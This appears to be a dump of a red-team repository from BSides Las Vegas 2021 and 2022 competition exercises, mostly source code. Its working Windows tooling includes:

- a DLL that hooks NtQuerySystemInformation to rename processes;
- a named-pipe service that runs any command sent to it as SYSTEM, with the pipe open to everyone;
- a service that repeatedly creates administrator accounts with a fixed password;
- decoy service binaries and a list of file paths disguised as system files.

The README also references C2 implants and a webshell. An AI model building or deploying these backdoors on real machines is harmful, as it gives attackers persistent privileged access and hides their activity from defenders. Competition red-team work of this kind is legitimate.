TRUE; 195 | } 196 | } 197 | return FALSE; 198 | } 199 | 200 | EXPORT BOOL WINAPI DllMain(HINSTANCE h, DWORD r, LPVOID args) { 201 | if (r == DLL_PROCESS_ATTACH) { 202 | // Check the file name to see if we should bail out. 203 | // Don't dynamically allocate this. It breaks things. 204 | WCHAR s[256]; 205 | int n = GetModuleFileNameW(NULL, (LPWSTR)s, MAX_PATH); 206 | if (n > 0 && Ignore(s, n)) { 207 | return TRUE; 208 | } 209 | Hook(&QuerySystemInfo, LoadLibraryW(L"ntdll.dll"), GetProcAddress(a, "NtQuerySystemInformation"), (ptr)&QuerySystemInfoFunc); 210 | } else if (r == DLL_PROCESS_DETACH) { 211 | Undo(&QuerySystemInfo); 212 | } 213 | return TRUE; 214 | } 215 | 216 | EXPORT NTSTATUS WINAPI QuerySystemInfoFunc(SYSTEM_INFORMATION_CLASS class, PVOID info, ULONG size, PULONG ret) { 217 | Undo(&QuerySystemInfo); 218 | NTSTATUS r = NtQuerySystemInformation(class, info, size, ret); 219 | Redo(&QuerySystemInfo); 220 | // Ignore errors or things we don't care about. 221 | if (size == 0 || r != 0x00000000 || class != SystemProcessInformation) { 222 | return r; 223 | } 224 | PSYSTEM_PROCESS_INFORMATION n = (PSYSTEM_PROCESS_INFORMATION)info; 225 | if (n->NextEntryOffset == 0) { 226 | return r; 227 | } 228 | int d = 0; 229 | PSYSTEM_PROCESS_INFORMATION c = NULL; 230 | while (n->NextEntryOffset != 0) { 231 | c = (PSYSTEM_PROCESS_INFORMATION)((PUCHAR)n+n->NextEntryOffset); 232 | if (d >= SIZE_LYRICS) { 233 | d = 0; 234 | } 235 | wcscpy_s(c->ImageName.Buffer, c->ImageName.Length, lyrics[d++]); 236 | n = c; 237 | continue; 238 | } 239 | return r; 240 | } 241 | -------------------------------------------------------------------------------- /BSidesLV-2021/privs/client.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | package main 4 | 5 | import ( 6 | "os" 7 | 8 | "github.com/iDigitalFlame/xmt/com/pipe" 9 | ) 10 | 11 | // client.go 12 | // Simple command line binary that connects to a named pipe and sends the args 
added. 13 | 14 | func main() { 15 | if len(os.Args) < 2 { 16 | os.Exit(0) 17 | } 18 | 19 | u, err := pipe.Dial(pipe.Format("")) 20 | if err != nil { 21 | os.Exit(1) 22 | } 23 | u.Write([]byte(os.Args[1])) 24 | u.Close() 25 | } 26 | -------------------------------------------------------------------------------- /BSidesLV-2021/privs/server.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | package main 4 | 5 | import ( 6 | "bytes" 7 | "io" 8 | "net" 9 | "strings" 10 | "sync" 11 | 12 | "github.com/iDigitalFlame/xmt/cmd" 13 | "github.com/iDigitalFlame/xmt/com/pipe" 14 | "github.com/iDigitalFlame/xmt/device/devtools" 15 | ) 16 | 17 | var bufs = sync.Pool{ 18 | New: func() interface{} { 19 | return new(bytes.Buffer) 20 | }, 21 | } 22 | 23 | // server.go 24 | // Hosts a named pipe as system that will run arbitrary commands passed to it. 25 | 26 | func main() { 27 | (&devtools.Service{Start: listen}).Run() 28 | } 29 | func listen() { 30 | l, err := pipe.ListenPerms(pipe.Format(""), pipe.PermEveryone) 31 | if err != nil { 32 | panic(err) 33 | } 34 | for { 35 | c, err := l.Accept() 36 | if err != nil { 37 | e, ok := err.(net.Error) 38 | if ok && e.Timeout() { 39 | continue 40 | } 41 | if ok && !e.Timeout() && !e.Temporary() { 42 | break 43 | } 44 | continue 45 | } 46 | b := bufs.Get().(*bytes.Buffer) 47 | io.Copy(b, c) 48 | c.Close() 49 | e := cmd.NewProcess("cmd.exe", "/c", strings.ReplaceAll(string(b.Bytes()), "\n", "")) 50 | b.Reset() 51 | // Fix a bug where cmd DOES NOT like the system working directory. 
52 | e.Dir = "C:\\" 53 | bufs.Put(b) 54 | e.SetWindowDisplay(0) 55 | e.SetParent(cmd.F().SetElevated(true).SetSession(false)) 56 | e.Start() 57 | } 58 | } 59 | -------------------------------------------------------------------------------- /BSidesLV-2021/user_add.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | package main 4 | 5 | import ( 6 | "strconv" 7 | "time" 8 | 9 | "github.com/iDigitalFlame/xmt/cmd" 10 | "github.com/iDigitalFlame/xmt/device/devtools" 11 | ) 12 | 13 | const userName = "JohnCena" 14 | 15 | // const userName = "MattDaemon" 16 | 17 | var count = 0 18 | 19 | // user_add.go 20 | // Fun thing, creates user accounts lol. 21 | 22 | func main() { 23 | (&devtools.Service{Exec: generate, Interval: time.Second * 30}).Run() 24 | } 25 | func generate() { 26 | p := cmd.NewProcess("cmd.exe", "/c", "net user "+userName+" "+strconv.Itoa(count)+" Password123 /add") 27 | p.Dir = "C:\\" 28 | p.SetParent(cmd.F().SetElevated(true)) 29 | p.SetWindowDisplay(0) 30 | p.Run() 31 | p = cmd.NewProcess("cmd.exe", "/c", "net localgroup Administrators "+userName+" "+strconv.Itoa(count)+" /add") 32 | // Fix a bug where cmd DOES NOT like the system working directory. 
33 | p.Dir = "C:\\" 34 | p.SetParent(cmd.F().SetElevated(true)) 35 | p.SetWindowDisplay(0) 36 | p.Run() 37 | count++ 38 | } 39 | -------------------------------------------------------------------------------- /BSidesLV-2022/README.md: -------------------------------------------------------------------------------- 1 | # BSides Las Vegas 2022 2 | 3 | ## Overview 4 | 5 | C2: [ThunderStorm](https://github.com/iDigitalFlame/ThunderStorm) 6 | 7 | Tools/Tech Used 8 | 9 | - Userland Hooking 10 | - [UserAdd Service](https://github.com/iDigitalFlame/ThunderStorm/blob/main/jetstream/templates/user_add.go) 11 | - JetStream "user_add" generator 12 | - [Privexec/Elevate Service](https://github.com/iDigitalFlame/ThunderStorm/blob/main/jetstream/templates/elevate_server.go) 13 | - JetStream "elevate" generator (server and client) 14 | - Multiple Flurry implants 15 | - Multiple Bolt implants 16 | - PowerShell inline beacons 17 | 18 | ## IOC List 19 | 20 | - [Binaries](files.txt) 21 | - [Cache/Support](cache.txt) 22 | - [Webshell](webshell.asp) 23 | 24 | Support Binaries (your favorite Duck service)! are in the [Support/src](Support/src) 25 | folder. You can build these with the [build.sh](Support/build.sh) script 26 | _(Requires MinGW)_ 27 | -------------------------------------------------------------------------------- /BSidesLV-2022/Support/build.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/bash 2 | # Copyright (C) 2020 - 2022 iDigitalFlame 3 | # 4 | # This program is free software: you can redistribute it and/or modify 5 | # it under the terms of the GNU General Public License as published by 6 | # the Free Software Foundation, either version 3 of the License, or 7 | # any later version. 8 | # 9 | # This program is distributed in the hope that it will be useful, 10 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the 12 | # GNU General Public License for more details. 13 | # 14 | # You should have received a copy of the GNU General Public License 15 | # along with this program. If not, see . 16 | # 17 | 18 | mkdir bin 2> /dev/null 19 | 20 | x86_64-w64-mingw32-windres --codepage=0xFDE9 --language=0x409 --output-format=coff -i src/duck.rc -o /tmp/duck-64.o 21 | x86_64-w64-mingw32-windres --codepage=0xFDE9 --language=0x409 --output-format=coff -i src/goose.rc -o /tmp/goose-64.o 22 | x86_64-w64-mingw32-windres --codepage=0xFDE9 --language=0x409 --output-format=coff -i src/manifest.rc -o /tmp/manifest-64.o 23 | 24 | x86_64-w64-mingw32-gcc -mwindows -fPIC -lkernel32 -lntdll -Wa,--strip-local-absolute \ 25 | -Wp,-femit-struct-debug-reduced,-O2 -Wl,-x,-s,-nostdlib,--no-insert-timestamp -o bin/duck-64.exe /tmp/duck-64.o /tmp/manifest-64.o src/duck.c 26 | 27 | x86_64-w64-mingw32-gcc -mwindows -fPIC -lkernel32 -lntdll -Wa,--strip-local-absolute \ 28 | -Wp,-femit-struct-debug-reduced,-O2 -Wl,-x,-s,-nostdlib,--no-insert-timestamp -o bin/goose-64.exe /tmp/goose-64.o /tmp/manifest-64.o src/goose.c 29 | 30 | x86_64-w64-mingw32-gcc -mwindows -fPIC -lkernel32 -lntdll -Wa,--strip-local-absolute \ 31 | -Wp,-femit-struct-debug-reduced,-O2 -Wl,-x,-s,-nostdlib,--no-insert-timestamp -o bin/nop-64.exe /tmp/manifest-64.o src/nop.c 32 | 33 | x86_64-w64-mingw32-gcc -mwindows -fPIC -lkernel32 -lntdll -Wa,--strip-local-absolute \ 34 | -Wp,-femit-struct-debug-reduced,-O2 -Wl,-x,-s,-nostdlib,--no-insert-timestamp -o bin/nop-svc-64.exe /tmp/manifest-64.o src/nop_svc.c 35 | 36 | # i686-w64-mingw32-windres --codepage=0xFDE9 --language=0x409 --output-format=coff -i src/duck.rc -o /tmp/duck-32.o 37 | # i686-w64-mingw32-windres --codepage=0xFDE9 --language=0x409 --output-format=coff -i src/goose.rc -o /tmp/goose-32.o 38 | # i686-w64-mingw32-windres --codepage=0xFDE9 --language=0x409 --output-format=coff -i src/manifest.rc -o /tmp/manifest-32.o 39 | 40 | # i686-w64-mingw32-gcc -mwindows -fPIC -lkernel32 
-lntdll -Wa,--strip-local-absolute \ 41 | # -Wp,-femit-struct-debug-reduced,-O2 -Wl,-x,-s,-nostdlib,--no-insert-timestamp -o bin/duck-32.exe /tmp/duck-32.o /tmp/manifest-32.o src/duck.c 42 | 43 | # i686-w64-mingw32-gcc -mwindows -fPIC -lkernel32 -lntdll -Wa,--strip-local-absolute \ 44 | # -Wp,-femit-struct-debug-reduced,-O2 -Wl,-x,-s,-nostdlib,--no-insert-timestamp -o bin/goose-32.exe /tmp/goose-32.o /tmp/manifest-32.o src/goose.c 45 | 46 | # i686-w64-mingw32-gcc -mwindows -fPIC -lkernel32 -lntdll -Wa,--strip-local-absolute \ 47 | # -Wp,-femit-struct-debug-reduced,-O2 -Wl,-x,-s,-nostdlib,--no-insert-timestamp -o bin/goose-32.exe /tmp/goose-32.o /tmp/manifest-32.o src/goose.c 48 | 49 | # i686-w64-mingw32-gcc -mwindows -fPIC -lkernel32 -lntdll -Wa,--strip-local-absolute \ 50 | # -Wp,-femit-struct-debug-reduced,-O2 -Wl,-x,-s,-nostdlib,--no-insert-timestamp -o bin/nop-32.exe /tmp/manifest-32.o src/nop.c 51 | 52 | # i686-w64-mingw32-gcc -mwindows -fPIC -lkernel32 -lntdll -Wa,--strip-local-absolute \ 53 | # -Wp,-femit-struct-debug-reduced,-O2 -Wl,-x,-s,-nostdlib,--no-insert-timestamp -o bin/nop-svc-32.exe /tmp/manifest-32.o src/nop_svc.c 54 | 55 | # rm /tmp/duck-32.o 56 | # rm /tmp/duck-64.o 57 | # rm /tmp/goose-32.o 58 | # rm /tmp/goose-64.o 59 | # rm /tmp/manifest-64.o 60 | -------------------------------------------------------------------------------- /BSidesLV-2022/Support/src/duck.c: -------------------------------------------------------------------------------- 1 | // Copyright (C) 2020 - 2022 iDigitalFlame 2 | // 3 | // This program is free software: you can redistribute it and/or modify 4 | // it under the terms of the GNU General Public License as published by 5 | // the Free Software Foundation, either version 3 of the License, or 6 | // any later version. 
7 | // 8 | // This program is distributed in the hope that it will be useful, 9 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | // GNU General Public License for more details. 12 | // 13 | // You should have received a copy of the GNU General Public License 14 | // along with this program. If not, see . 15 | // 16 | 17 | #define WINVER 0x0501 18 | #define _WIN32_WINNT 0x0501 19 | 20 | #define NOWH 21 | #define NOMB 22 | #define NOMSG 23 | #define NONLS 24 | #define NOMCX 25 | #define NOIME 26 | #define NOHELP 27 | #define NOCOMM 28 | #define NOICONS 29 | #define NOCRYPT 30 | #define NOKANJI 31 | #define NOSOUND 32 | #define NOCOLOR 33 | #define NOMENUS 34 | #define NOCTLMGR 35 | #define NOMINMAX 36 | #define NOSCROLL 37 | #define NODRAWTEXT 38 | #define NOMETAFILE 39 | #define NOPROFILER 40 | #define NOKEYSTATES 41 | #define NORASTEROPS 42 | #define NOCLIPBOARD 43 | #define NOWINSTYLES 44 | #define NOSYSMETRICS 45 | #define NOWINOFFSETS 46 | #define NOSHOWWINDOW 47 | #define NOTEXTMETRIC 48 | #define NOSYSCOMMANDS 49 | #define NOGDICAPMASKS 50 | #define NOWINMESSAGES 51 | #define NODEFERWINDOWPOS 52 | #define NOVIRTUALKEYCODES 53 | #define WIN32_LEAN_AND_MEAN 54 | 55 | #include 56 | 57 | HANDLE stopDuck; 58 | SERVICE_STATUS_HANDLE duck; 59 | 60 | void WINAPI DuckQuack(DWORD); 61 | void WINAPI DuckService(DWORD, LPWSTR*); 62 | 63 | int main(int argc, char *argv[]) { 64 | if (argc > 1) { 65 | SERVICE_TABLE_ENTRYW t[] = {{L"", &DuckService}, {NULL, NULL}}; 66 | StartServiceCtrlDispatcherW(t); 67 | return 0; 68 | } 69 | STARTUPINFOW s; 70 | PROCESS_INFORMATION i; 71 | memset(&i, 0, sizeof(i)); 72 | memset(&s, 0, sizeof(s)); 73 | s.cb = sizeof(STARTUPINFOW); 74 | if (!CreateProcessW(L"goose.exe", L"C:\\Windows\\System32\\goose.exe", NULL, NULL, TRUE, 0, NULL, NULL, &s, &i)) { 75 | return 1; 76 | } 77 | WaitForSingleObject(i.hProcess, INFINITE); 78 | CloseHandle(i.hThread); 79 | 
CloseHandle(i.hProcess); 80 | return 0; 81 | } 82 | 83 | DWORD WINAPI DuckQuacker(DWORD c, DWORD v, void *d, void *x) { 84 | switch(c) { 85 | case SERVICE_CONTROL_STOP: 86 | case SERVICE_CONTROL_SHUTDOWN: 87 | DuckQuack(0x3); 88 | SetEvent(stopDuck); 89 | break; 90 | default: 91 | DuckQuack(0x4); 92 | break; 93 | } 94 | return 0; 95 | } 96 | 97 | void WINAPI DuckQuack(DWORD s) { 98 | SERVICE_STATUS v = {0x10, s, 0x5, 0, 0, 0, 0}; 99 | SetServiceStatus(duck, &v); 100 | } 101 | void WINAPI DuckService(DWORD argc, LPWSTR *argv) { 102 | duck = RegisterServiceCtrlHandlerExW(L"DuckService", &DuckQuacker, NULL); 103 | DuckQuack(0x2); 104 | stopDuck = CreateEventW(NULL, TRUE, FALSE, NULL); 105 | DuckQuack(0x4); 106 | WCHAR v[MAX_PATH]; 107 | int n = GetModuleFileNameW(NULL, (LPWSTR)v, MAX_PATH); 108 | if (n == 0) { 109 | CloseHandle(stopDuck); 110 | DuckQuack(0x1); 111 | return; 112 | } 113 | STARTUPINFOW s; 114 | PROCESS_INFORMATION i; 115 | memset(&i, 0, sizeof(i)); 116 | memset(&s, 0, sizeof(s)); 117 | s.cb = sizeof(STARTUPINFOW); 118 | if (!CreateProcessW(v, v, NULL, NULL, TRUE, 0, NULL, NULL, &s, &i)) { 119 | CloseHandle(stopDuck); 120 | DuckQuack(0x1); 121 | return; 122 | } 123 | WaitForSingleObject(stopDuck, INFINITE); 124 | TerminateProcess(i.hProcess, 0); 125 | CloseHandle(i.hThread); 126 | CloseHandle(i.hProcess); 127 | DuckQuack(0x3); 128 | CloseHandle(stopDuck); 129 | DuckQuack(0x1); 130 | } 131 | -------------------------------------------------------------------------------- /BSidesLV-2022/Support/src/duck.rc: -------------------------------------------------------------------------------- 1 | // Copyright (C) 2020 - 2022 iDigitalFlame 2 | // 3 | // This program is free software: you can redistribute it and/or modify 4 | // it under the terms of the GNU General Public License as published by 5 | // the Free Software Foundation, either version 3 of the License, or 6 | // any later version. 
7 | // 8 | // This program is distributed in the hope that it will be useful, 9 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | // GNU General Public License for more details. 12 | // 13 | // You should have received a copy of the GNU General Public License 14 | // along with this program. If not, see . 15 | // 16 | 17 | #include 18 | 19 | VS_VERSION_INFO VERSIONINFO 20 | FILEVERSION 1,2,3,4 21 | PRODUCTVERSION 1,2,3,4 22 | FILEFLAGSMASK VS_FFI_FILEFLAGSMASK 23 | FILEFLAGS 0 24 | FILEOS VOS__WINDOWS32 25 | FILETYPE VFT_DLL 26 | FILESUBTYPE VFT2_UNKNOWN 27 | 28 | BEGIN 29 | BLOCK "StringFileInfo" 30 | BEGIN 31 | BLOCK "040904B0" 32 | BEGIN 33 | VALUE "Comments", "*quack*" 34 | VALUE "CompanyName", "Duck Co!" 35 | VALUE "FileDescription", "Uhhh... I'm a duck!" 36 | VALUE "FileVersion", "1.2.3.4" 37 | VALUE "InternalName", "Duck!" 38 | VALUE "LegalCopyright", "Copyright 2022 any Lakes" 39 | VALUE "OriginalFilename", "duck.exe" 40 | VALUE "ProductName", "Duck Duck Goose!" 41 | VALUE "ProductVersion", "1.2.3.4" 42 | END 43 | END 44 | BLOCK "VarFileInfo" 45 | BEGIN 46 | VALUE "Translation", 0x409, 1200 47 | END 48 | END -------------------------------------------------------------------------------- /BSidesLV-2022/Support/src/goose.c: -------------------------------------------------------------------------------- 1 | // Copyright (C) 2020 - 2022 iDigitalFlame 2 | // 3 | // This program is free software: you can redistribute it and/or modify 4 | // it under the terms of the GNU General Public License as published by 5 | // the Free Software Foundation, either version 3 of the License, or 6 | // any later version. 7 | // 8 | // This program is distributed in the hope that it will be useful, 9 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | // GNU General Public License for more details. 
12 | // 13 | // You should have received a copy of the GNU General Public License 14 | // along with this program. If not, see . 15 | // 16 | 17 | #define WINVER 0x0501 18 | #define _WIN32_WINNT 0x0501 19 | 20 | #define NOWH 21 | #define NOMB 22 | #define NOMSG 23 | #define NONLS 24 | #define NOMCX 25 | #define NOIME 26 | #define NOHELP 27 | #define NOCOMM 28 | #define NOICONS 29 | #define NOCRYPT 30 | #define NOKANJI 31 | #define NOSOUND 32 | #define NOCOLOR 33 | #define NOMENUS 34 | #define NOCTLMGR 35 | #define NOMINMAX 36 | #define NOSCROLL 37 | #define NODRAWTEXT 38 | #define NOMETAFILE 39 | #define NOPROFILER 40 | #define NOKEYSTATES 41 | #define NORASTEROPS 42 | #define NOCLIPBOARD 43 | #define NOWINSTYLES 44 | #define NOSYSMETRICS 45 | #define NOWINOFFSETS 46 | #define NOSHOWWINDOW 47 | #define NOTEXTMETRIC 48 | #define NOSYSCOMMANDS 49 | #define NOGDICAPMASKS 50 | #define NOWINMESSAGES 51 | #define NODEFERWINDOWPOS 52 | #define NOVIRTUALKEYCODES 53 | #define WIN32_LEAN_AND_MEAN 54 | 55 | #include 56 | 57 | int main(int argc, char *argv[]) { 58 | SleepEx(INFINITE, TRUE); 59 | } 60 | -------------------------------------------------------------------------------- /BSidesLV-2022/Support/src/goose.rc: -------------------------------------------------------------------------------- 1 | // Copyright (C) 2020 - 2022 iDigitalFlame 2 | // 3 | // This program is free software: you can redistribute it and/or modify 4 | // it under the terms of the GNU General Public License as published by 5 | // the Free Software Foundation, either version 3 of the License, or 6 | // any later version. 7 | // 8 | // This program is distributed in the hope that it will be useful, 9 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | // GNU General Public License for more details. 12 | // 13 | // You should have received a copy of the GNU General Public License 14 | // along with this program. 
If not, see . 15 | // 16 | 17 | #include 18 | 19 | VS_VERSION_INFO VERSIONINFO 20 | FILEVERSION 1,2,3,4 21 | PRODUCTVERSION 1,2,3,4 22 | FILEFLAGSMASK VS_FFI_FILEFLAGSMASK 23 | FILEFLAGS 0 24 | FILEOS VOS__WINDOWS32 25 | FILETYPE VFT_DLL 26 | FILESUBTYPE VFT2_UNKNOWN 27 | 28 | BEGIN 29 | BLOCK "StringFileInfo" 30 | BEGIN 31 | BLOCK "040904B0" 32 | BEGIN 33 | VALUE "Comments", "*stares in goose*" 34 | VALUE "CompanyName", "Duck Co!" 35 | VALUE "FileDescription", "Peace was never an option" 36 | VALUE "FileVersion", "1.2.3.4" 37 | VALUE "InternalName", "Goose!" 38 | VALUE "LegalCopyright", "Copyright 2022 any Lakes" 39 | VALUE "OriginalFilename", "goose.exe" 40 | VALUE "ProductName", "Hajonk" 41 | VALUE "ProductVersion", "1.2.3.4" 42 | END 43 | END 44 | BLOCK "VarFileInfo" 45 | BEGIN 46 | VALUE "Translation", 0x409, 1200 47 | END 48 | END -------------------------------------------------------------------------------- /BSidesLV-2022/Support/src/manifest.rc: -------------------------------------------------------------------------------- 1 | // Copyright (C) 2020 - 2022 iDigitalFlame 2 | // 3 | // This program is free software: you can redistribute it and/or modify 4 | // it under the terms of the GNU General Public License as published by 5 | // the Free Software Foundation, either version 3 of the License, or 6 | // any later version. 7 | // 8 | // This program is distributed in the hope that it will be useful, 9 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | // GNU General Public License for more details. 12 | // 13 | // You should have received a copy of the GNU General Public License 14 | // along with this program. If not, see . 
15 | // 16 | 17 | #include "winuser.h" 18 | 1 RT_MANIFEST manifest.xml 19 | -------------------------------------------------------------------------------- /BSidesLV-2022/Support/src/manifest.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | -------------------------------------------------------------------------------- /BSidesLV-2022/Support/src/nop.c: -------------------------------------------------------------------------------- 1 | // Copyright (C) 2020 - 2022 iDigitalFlame 2 | // 3 | // This program is free software: you can redistribute it and/or modify 4 | // it under the terms of the GNU General Public License as published by 5 | // the Free Software Foundation, either version 3 of the License, or 6 | // any later version. 7 | // 8 | // This program is distributed in the hope that it will be useful, 9 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | // GNU General Public License for more details. 12 | // 13 | // You should have received a copy of the GNU General Public License 14 | // along with this program. If not, see . 
15 | // 16 | 17 | #define WINVER 0x0501 18 | #define _WIN32_WINNT 0x0501 19 | 20 | #define NOWH 21 | #define NOMB 22 | #define NOMSG 23 | #define NONLS 24 | #define NOMCX 25 | #define NOIME 26 | #define NOHELP 27 | #define NOCOMM 28 | #define NOICONS 29 | #define NOCRYPT 30 | #define NOKANJI 31 | #define NOSOUND 32 | #define NOCOLOR 33 | #define NOMENUS 34 | #define NOCTLMGR 35 | #define NOMINMAX 36 | #define NOSCROLL 37 | #define NODRAWTEXT 38 | #define NOMETAFILE 39 | #define NOPROFILER 40 | #define NOKEYSTATES 41 | #define NORASTEROPS 42 | #define NOCLIPBOARD 43 | #define NOWINSTYLES 44 | #define NOSYSMETRICS 45 | #define NOWINOFFSETS 46 | #define NOSHOWWINDOW 47 | #define NOTEXTMETRIC 48 | #define NOSYSCOMMANDS 49 | #define NOGDICAPMASKS 50 | #define NOWINMESSAGES 51 | #define NODEFERWINDOWPOS 52 | #define NOVIRTUALKEYCODES 53 | #define WIN32_LEAN_AND_MEAN 54 | 55 | #include 56 | 57 | int main(int argc, char *argv[]) { 58 | SleepEx(INFINITE, TRUE); 59 | } 60 | -------------------------------------------------------------------------------- /BSidesLV-2022/Support/src/nop_svc.c: -------------------------------------------------------------------------------- 1 | // Copyright (C) 2020 - 2022 iDigitalFlame 2 | // 3 | // This program is free software: you can redistribute it and/or modify 4 | // it under the terms of the GNU General Public License as published by 5 | // the Free Software Foundation, either version 3 of the License, or 6 | // any later version. 7 | // 8 | // This program is distributed in the hope that it will be useful, 9 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | // GNU General Public License for more details. 12 | // 13 | // You should have received a copy of the GNU General Public License 14 | // along with this program. If not, see . 
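//

#define WINVER 0x0501
#define _WIN32_WINNT 0x0501

#define NOWH
#define NOMB
#define NOMSG
#define NONLS
#define NOMCX
#define NOIME
#define NOHELP
#define NOCOMM
#define NOICONS
#define NOCRYPT
#define NOKANJI
#define NOSOUND
#define NOCOLOR
#define NOMENUS
#define NOCTLMGR
#define NOMINMAX
#define NOSCROLL
#define NODRAWTEXT
#define NOMETAFILE
#define NOPROFILER
#define NOKEYSTATES
#define NORASTEROPS
#define NOCLIPBOARD
#define NOWINSTYLES
#define NOSYSMETRICS
#define NOWINOFFSETS
#define NOSHOWWINDOW
#define NOTEXTMETRIC
#define NOSYSCOMMANDS
#define NOGDICAPMASKS
#define NOWINMESSAGES
#define NODEFERWINDOWPOS
#define NOVIRTUALKEYCODES
#define WIN32_LEAN_AND_MEAN

// The header name was lost in extraction; <windows.h> (which pulls in winsvc.h
// unless NOSERVICE is defined) supplies every API and constant used below.
#include <windows.h>

// Manual-reset event signalled by ServiceManager() when the service must stop.
HANDLE runPLz;
// Status handle from RegisterServiceCtrlHandlerExW(); NULL if registration failed.
SERVICE_STATUS_HANDLE run;

void WINAPI UpdateState(DWORD);
void WINAPI DuckService(DWORD, LPWSTR*);

// Entry point: hands the process to the SCM dispatcher. The empty service name is
// permitted for an own-process service, whose single table entry is used regardless
// of the name. The exit code stays 0 even when the dispatcher fails (for example
// when started from a console rather than by the SCM), as in the original.
int main(int argc, char *argv[]) {
    SERVICE_TABLE_ENTRYW t[] = {{L"", &DuckService}, {NULL, NULL}};
    StartServiceCtrlDispatcherW(t);
    return 0;
}

// Control handler (HandlerEx signature). STOP and SHUTDOWN move the service to
// STOP_PENDING and wake DuckService(); any other control just re-reports RUNNING.
// 'v', 'd' and 'x' are unused. Always returns NO_ERROR.
DWORD WINAPI ServiceManager(DWORD c, DWORD v, void *d, void *x) {
    switch (c) {
    case SERVICE_CONTROL_STOP:
    case SERVICE_CONTROL_SHUTDOWN:
        UpdateState(SERVICE_STOP_PENDING);
        SetEvent(runPLz);
        break;
    default:
        UpdateState(SERVICE_RUNNING);
        break;
    }
    return NO_ERROR;
}

// Reports state 's' to the SCM as an own-process service that accepts STOP and
// SHUTDOWN. Exit codes, checkpoint and wait hint are always zero.
void WINAPI UpdateState(DWORD s) {
    SERVICE_STATUS v = {SERVICE_WIN32_OWN_PROCESS, s, SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN, 0, 0, 0, 0};
    SetServiceStatus(run, &v);
}

// ServiceMain: registers the control handler, reports RUNNING, then blocks until
// ServiceManager() signals runPLz. 'argc'/'argv' are unused.
void WINAPI DuckService(DWORD argc, LPWSTR *argv) {
    // Create the stop event BEFORE the control handler can be invoked: a STOP or
    // SHUTDOWN delivered while the handle was still NULL would hit SetEvent(NULL),
    // fail, and leave the service waiting forever.
    runPLz = CreateEventW(NULL, TRUE, FALSE, NULL);
    run = RegisterServiceCtrlHandlerExW(L"", &ServiceManager, NULL);
    if (run == NULL) {
        // Without a status handle nothing can be reported to the SCM; clean up and leave.
        if (runPLz != NULL) {
            CloseHandle(runPLz);
            runPLz = NULL;
        }
        return;
    }
    UpdateState(SERVICE_START_PENDING);
    if (runPLz == NULL) {
        // No event to wait on: report a clean stop instead of waiting on a NULL handle.
        UpdateState(SERVICE_STOPPED);
        return;
    }
    UpdateState(SERVICE_RUNNING);
    WaitForSingleObject(runPLz, INFINITE);
    UpdateState(SERVICE_STOP_PENDING);
    CloseHandle(runPLz);
    runPLz = NULL; // a late control must not SetEvent() a closed handle
    UpdateState(SERVICE_STOPPED);
}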
-------------------------------------------------------------------------------- /BSidesLV-2022/cache.txt: -------------------------------------------------------------------------------- 1 | C:\Windows\Inf\MSDTC\vbscript.h 2 | C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data.OracleClient\v4.0_4.0.0.0__b77a5c561934e089\System.Data.OracleCluunt.dll 3 | C:\Windows\SysWOW64\Speech\Common\amdxata.dll 4 | C:\Windows\SysWOW64\zh-HK\nms.dll.mui 5 | C:\Windows\Boot\PCAT\en-GB\bootmfr.exe.mui 6 | C:\Program Files (x86)\Internet Explorer\IEShiws.exe 7 | C:\Windows\System32\zh-CN\WWOHost.exe.mui 8 | C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_6.3.0.0__31bf3856ad364e35\stexstor.dll 9 | C:\Windows\Boot\PCAT\en-GB\ceipdata.mui 10 | C:\Windows\Boot\EFI\lt-LT\bootmgn.efi.mui 11 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.VolumeActivation.Plugin.Resources\v4.0_6.3.0.0_en_31bf3856ad364e35\Microsoft.Windows.VolumeActivation.Plugon.Resourceo.dll 12 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\cht4vx64.dll 13 | C:\Windows\Boot\EFI\sr-Latn-RS\bootmgvw.efi.mui 14 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Buicd.Utilities.v4.wsa 15 | C:\Windows\Microsoft.NET\assembly\GAC_64\blbproxy\v4.0_6.3.0.0__31bf3856ad364e35\rasauto.dll 16 | C:\Windows\SysWOW64\Windows.Networking.BackgroundBransfer.xsl 17 | C:\Windows\Inf\.NET Data Provider for Oracle\0000\ndistapi.ini 18 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\blbmmc.resources\v4.0_6.3.0.0_en_31bf3856ad364e35\diskperf.dll 19 | C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\msrd3x40.dll 20 | C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\Sysqem.Web.dll 21 | C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.GroupPolicy.AdmTmplEditor\v4.0_6.3.0.0__31bf3856ad364e35\ETWESEProviderResources.dll 22 | 
